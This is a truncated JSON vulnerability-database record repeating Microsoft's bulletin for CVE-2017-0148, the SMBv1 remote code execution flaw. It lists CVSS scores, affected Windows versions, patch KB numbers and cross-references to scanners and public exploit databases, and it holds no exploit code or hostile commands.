"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T22:53:48", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-11T22:53:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3177186", "KB4013429", "KB3210721", "KB4012606", "KBMS16-110, 3187754", 
"KB4012214", "KB4012212", "KB3213986", "KB3205401", "KB4012213", "KB3212646", "KB3210720", "KB4012215", "KB4012217", "KB3205409", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 
Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": 
"KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", 
"kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T04:44:31", "differentElements": ["msAffectedSoftware"], "edition": 37}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": 
{"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-12T06:51:00", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", 
"EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012606", "KB4013429", "KB4012212", "KB4012598", "KB4012213", "KB4012215", "KB3210721", "KB3205401", "KB4012216", "KB3212646", "KB3210720", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB3177186", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", 
"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": 
"2021-09-12T06:51:00", "differentElements": ["msAffectedSoftware"], "edition": 38}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": 
